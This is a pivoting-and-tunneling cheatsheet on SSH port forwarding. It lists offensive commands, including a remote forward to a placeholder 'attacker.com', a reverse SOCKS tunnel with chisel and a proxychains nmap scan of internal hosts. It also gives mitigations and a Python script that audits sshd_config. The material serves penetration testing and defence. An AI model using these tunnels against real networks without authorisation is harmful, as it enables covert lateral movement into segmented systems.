SSH Port Forwarding

Pivoting & Tunneling cheatsheet — Network pivoting and tunneling techniques.

Overview

SSH Port Forwarding (tunneling) allows an attacker to use a compromised host as a proxy to access internal networks. By forwarding ports through SSH tunnels, attackers can reach systems in segmented network zones that are not directly accessible.

Three types of SSH forwarding are used: local (-L), remote (-R), and dynamic (-D), which opens a SOCKS proxy.

Category: Pivoting & Tunneling

Key Commands & Payloads

The following commands and payloads are commonly used when testing for or exploiting SSH port forwarding:

ssh -L 8080:internal-server:80 user@jumphost
ssh -R 8080:localhost:80 user@attacker.com
ssh -D 9050 user@jumphost
echo 'ProxyCommand /usr/bin/nc -x 127.0.0.1:9050 %h %p' >> ~/.ssh/config
proxychains nmap -sT -sV -p 80,443,445 internal-server
chisel client jumphost:8000 R:1080:socks
chisel server -p 8000 --reverse

Tools & Techniques

Recommended tools for SSH port forwarding:

  • SSH -L: forward local port to remote target
  • SSH -R: forward remote port to local target
  • SSH -D: SOCKS5 dynamic proxy
  • Chisel: HTTP tunneling with SOCKS support
  • Proxychains: force any tool through SOCKS proxy
  • AutoSSH: maintain persistent SSH tunnels

Prevention & Mitigation

Security recommendations to prevent SSH port forwarding:

  • Restrict SSH access with strict firewall rules
  • Use SSH key authentication with passphrases
  • Use jump hosts with auditing for all SSH sessions
  • Limit SSH forwarding with AllowTcpForwarding no
  • Monitor for unusual SSH tunnel establishment
  • Use network segmentation to limit lateral movement
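One way to check the AllowTcpForwarding recommendation above is to audit sshd_config for every directive that still permits tunneling. This is an added example, not part of the original cheatsheet: the sample configuration is constructed, the function names are hypothetical, and the defaults are those documented in sshd_config(5).

```python
import re

# OpenSSH defaults for the directives that control tunneling (sshd_config(5)).
DEFAULTS = {
    "allowtcpforwarding": "yes",          # TCP forwarding: -L / -R / -D
    "allowstreamlocalforwarding": "yes",  # Unix-domain socket forwarding
    "gatewayports": "no",                 # remote forwards bound off-loopback
    "permittunnel": "no",                 # tun(4) device forwarding
}

# Constructed sample configuration, not taken from a real host.
SAMPLE = """\
Port 22
AllowTcpForwarding no
allowtcpforwarding yes   # ignored: sshd keeps the first value it reads
PermitTunnel no

Match User deploy
    AllowTcpForwarding local
    GatewayPorts clientspecified
"""

def parse(text):
    """Return {scope: {keyword: value}}; scope is 'global' or the Match line."""
    scopes, scope = {"global": {}}, "global"
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()  # drop comments and blank lines
        if not line:
            continue
        parts = re.split(r"[ \t=]+", line, maxsplit=1) + [""]
        key, value = parts[0].lower(), parts[1].strip()  # keywords are case-insensitive
        if key == "match":
            scope = "match " + value
            scopes.setdefault(scope, {})
        else:
            scopes[scope].setdefault(key, value.lower())  # first value wins
    return scopes

def audit(text):
    """Return (scope, keyword, value) for each setting that permits forwarding."""
    scopes, findings = parse(text), []
    for scope, own in scopes.items():
        eff = {**DEFAULTS, **scopes["global"], **own}  # Match overrides global
        if eff.get("disableforwarding") == "yes":      # overrides TCP/StreamLocal
            eff.update(allowtcpforwarding="no", allowstreamlocalforwarding="no")
        for key in DEFAULTS:
            if eff[key] != "no" and (scope == "global" or key in own):
                findings.append((scope, key, eff[key]))
    return findings
```

On the sample, AllowTcpForwarding no still leaves Unix-domain socket forwarding enabled by default, and the Match block re-enables local TCP forwarding for one user. sshd_config(5) also notes that disabling TCP forwarding does not improve security unless users are denied shell access as well, since they can install their own forwarders.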
